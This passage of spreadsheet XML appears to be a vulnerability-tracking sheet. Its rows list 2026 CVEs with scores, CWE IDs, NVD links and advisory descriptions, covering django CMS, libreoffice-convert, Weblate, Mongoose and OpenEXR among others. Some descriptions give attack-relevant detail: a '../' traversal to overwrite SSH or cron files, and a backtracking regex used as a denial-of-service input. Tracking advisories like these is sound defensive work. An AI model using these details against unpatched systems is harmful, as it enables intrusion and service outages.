      <c r="S710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53769</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54622</t>
        </is>
      </c>
      <c r="D711" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E711" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F711" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr"/>
      <c r="Q711" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R711" s="5" t="inlineStr">
        <is>
          <t>django CMS is an easy-to-use and developer-friendly enterprise content management system powered by Django. Prior to 5.0.8, the copy_plugins endpoint in cms/admin/placeholderadmin.py authorizes only the destination clipboard. The _copy_plugin_to_clipboard and _copy_placeholder_to_clipboard paths accept source_placeholder_id and source_plugin_id values but use has_copy_plugins_permission and check_source only for the requesting user’s clipboard, without validating the source placeholder. Under CMS_PERMISSION, a staff user with the global add permission for a plugin type can copy plugins from an unauthorized page or placeholder into the user’s clipboard and read secret text, link names, and URLs. This issue is fixed in versions 5.0.8.</t>
        </is>
      </c>
      <c r="S711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54622</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54624</t>
        </is>
      </c>
      <c r="D712" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E712" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F712" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr"/>
      <c r="Q712" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="R712" s="5" t="inlineStr">
        <is>
          <t>django CMS is an easy-to-use and developer-friendly enterprise content management system powered by Django. Prior to 5.0.8, render_object_structure in cms/views.py renders cms/toolbar/structure.html for a PageContent object without calling user_can_view_page(). Any staff account can request a restricted page’s structure when CMS_PERMISSION is enabled and the page has view restrictions or CMS_PUBLIC_FOR is set to staff. The response exposes plugin get_short_description() values, including link names, URLs, and text snippets, rather than only the page shape. This issue is fixed in versions 5.0.8.</t>
        </is>
      </c>
      <c r="S712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54624</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54732</t>
        </is>
      </c>
      <c r="D713" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E713" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F713" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr"/>
      <c r="Q713" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R713" s="5" t="inlineStr">
        <is>
          <t>libreoffice-convert is a Node.js module for converting office documents to different formats. Prior to 1.8.2, index.js uses the caller-controlled options.fileName value in path.join(tempDir.name, fileName) without reducing it to a base name. A filename containing ../ can escape the temporary directory because path.basename() normalization is missing and write the supplied document buffer to an arbitrary path writable by the process, including an SSH authorized_keys file, a cron configuration, or a web root. This issue is fixed in version 1.8.2.</t>
        </is>
      </c>
      <c r="S713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54732</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55221</t>
        </is>
      </c>
      <c r="D714" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E714" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F714" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr"/>
      <c r="Q714" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R714" s="5" t="inlineStr">
        <is>
          <t>Boruta is a standalone authorization server that aims to implement OAuth 2.0 and Openid Connect up to decentralized identity specifications. Prior to version 0.10.0, Boruta logged sensitive OAuth and OpenID Connect values in business event logs. Logged values could include access tokens, refresh tokens, authorization codes, agent tokens, direct-post codes, ID tokens, VP tokens, and tokens submitted to introspection or revocation endpoints. An attacker with access to Boruta logs, log aggregation systems, or the administration log viewer could recover these credentials and use them until expiration or revocation. This issue has been patched in version 0.10.0.</t>
        </is>
      </c>
      <c r="S714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55221</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55531</t>
        </is>
      </c>
      <c r="D715" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E715" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F715" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr"/>
      <c r="Q715" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R715" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, the MCP HTTP Stream mcp_post handler creates a new _sessions entry for every initialize request but does not call _cleanup_sessions or enforce a maximum. An unauthenticated caller can exhaust memory. The fix invokes cleanup and limits sessions through PRAISONAI_MCP_MAX_SESSIONS. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55531</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55588</t>
        </is>
      </c>
      <c r="D716" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E716" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F716" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr"/>
      <c r="Q716" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674, CWE-835</t>
        </is>
      </c>
      <c r="R716" s="5" t="inlineStr">
        <is>
          <t>ORAS (OCI Registry As Storage) is a CLI and library for managing artifacts in OCI registries. In ORAS CLI versions up to and including 1.3.2, the recursive referrer traversal does not track visited descriptors, so a malicious OCI registry that returns a cyclic referrer graph causes unbounded recursion and memory growth. This affects oras discover, whose recursive traversal is enabled by default because the --depth option defaults to 0 (unlimited), as well as the recursive referrer counting used by the oras backup and oras restore workflows. A cyclic graph can be as simple as A referring to B and B referring back to A. A malicious registry can use this to cause a client-side denial of service, exhausting CPU and memory and hanging automation or CI/CD pipelines that run ORAS against untrusted registry metadata. The vulnerability does not extend to code execution, artifact substitution, or integrity bypass. This issue has been fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="S716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55588</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55618</t>
        </is>
      </c>
      <c r="D717" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E717" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F717" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr"/>
      <c r="Q717" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R717" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, the clean_found_uri function in eml_parser/parser.py validates potential URL strings before unescaping HTML entities used for colon, slash, or period characters. Valid encoded URLs and their host names are therefore rejected and omitted from the extracted URL and domain lists. Email security gateways and SOC pipelines that use those lists as indicators of compromise may fail to submit the hidden URLs to threat intelligence feeds, reputation services, or sandboxes, allowing malicious links to bypass inspection. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="S717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55618</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61908</t>
        </is>
      </c>
      <c r="D718" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E718" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr"/>
      <c r="Q718" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R718" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. A JMAP email-header blob ID can reference an out-of-bounds index. An authenticated user could attempt to download a crafted JMAP blob ID of the form H&lt;emailid&gt;-&lt;index&gt;, which could read past the end of the internal blob_headers array during download, exposing adjacent heap memory.</t>
        </is>
      </c>
      <c r="S718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61908</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62326</t>
        </is>
      </c>
      <c r="D719" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E719" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F719" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr"/>
      <c r="Q719" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R719" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, a user with the built-in "Edit source" role can store a malicious regular expression in a source string's flags that is executed without any timeout, allowing them to stall requests and deny service. Regular expressions supplied through the regex: quality check and regex placeholders are compiled during validation but later run against translation content in RegexCheck and PlaceholderCheck with no time limit, so a catastrophic-backtracking pattern like ^(a|aa)+$ can consume CPU indefinitely. Because Weblate re-runs these checks for every linked target unit in the same request when a source unit's flags change, a single edit can trigger sustained CPU-bound denial of service. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="S719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62326</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68516</t>
        </is>
      </c>
      <c r="D720" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E720" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F720" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr"/>
      <c r="Q720" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-787</t>
        </is>
      </c>
      <c r="R720" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. From version 3.4.0 through 3.4.13, a crafted HTJ2K-compressed EXR can crash OpenEXR during normal decode. An HTJ2K-compressed EXR whose JPEG 2000 SIZ fields place the first tile outside the visible image can reach invalid tile and codeblock geometry in the vendored OpenJPH AVX2 decoder, causing a stack out-of-bounds write and denial of service. OpenEXR's HTJ2K path validates the decoded codestream dimensions against the EXR chunk size, but it does not reject SIZ image-offset/tile-grid geometry where the first tile does not intersect the image. This issue is fixed in version 3.4.14.</t>
        </is>
      </c>
      <c r="S720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68516</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73255</t>
        </is>
      </c>
      <c r="D721" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E721" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F721" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr"/>
      <c r="Q721" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R721" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, an attacker who can control an SSI-enabled file can place directory traversal sequences in an #include file or #include virtual directive. The mg_ssi() function in src/ssi.c concatenates the directive argument into a filesystem path without calling mg_path_is_sane(), allowing an MG_ENABLE_SSI deployment with ssi_pattern configured to disclose files readable by the Mongoose process. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73255</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73258</t>
        </is>
      </c>
      <c r="D722" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E722" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F722" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr"/>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr"/>
      <c r="Q722" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="R722" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, a remote attacker can place a lone carriage return or line feed in multipart input processed by mg_http_next_multipart() in src/http.c. The loops comparing s[b] and s[b + 1], and s[h2] and s[h2 + 1], use an incorrect AND condition and stop when either character resembles part of a CRLF terminator. This truncates headers, filenames, or boundaries and can cause an application to accept dangerous content after seeing a misleading Content-Type value. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73258</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73788</t>
        </is>
      </c>
      <c r="D723" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E723" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F723" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr"/>
      <c r="Q723" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R723" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the ClearPass OnGuard agent could allow an authenticated remote attacker to elevate their own privileges on a vulnerable ClearPass OnGuard deployment. Successful exploitation could allow an attacker to obtain root privileges, leading to potentially unauthorized operation of the vulnerable system.</t>
        </is>
      </c>
      <c r="S723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73788</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75162</t>
        </is>
      </c>
      <c r="D724" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E724" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F724" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr"/>
      <c r="Q724" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R724" s="5" t="inlineStr">
        <is>
          <t>An information disclosure vulnerability in the opcua-configuration method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows any remote authenticated user, including users with the low-privileged Standard role, to retrieve the configured OPC-UA authentication credentials in cleartext via the JSON API response.</t>
        </is>
      </c>
      <c r="S724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75162</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75165</t>
        </is>
      </c>
      <c r="D725" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E725" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F725" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr"/>
      <c r="Q725" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R725" s="5" t="inlineStr">
        <is>
          <t>An issue in /cgi-bin/wwwugw.cgi of MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to invoke hidden network diagnostic methods (ugw-ping, ugw-traceroute) that are not exposed in the web UI, allowing attackers to obtain sensitive information.</t>
        </is>
      </c>
      <c r="S725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75165</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75370</t>
        </is>
      </c>
      <c r="D726" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E726" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F726" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
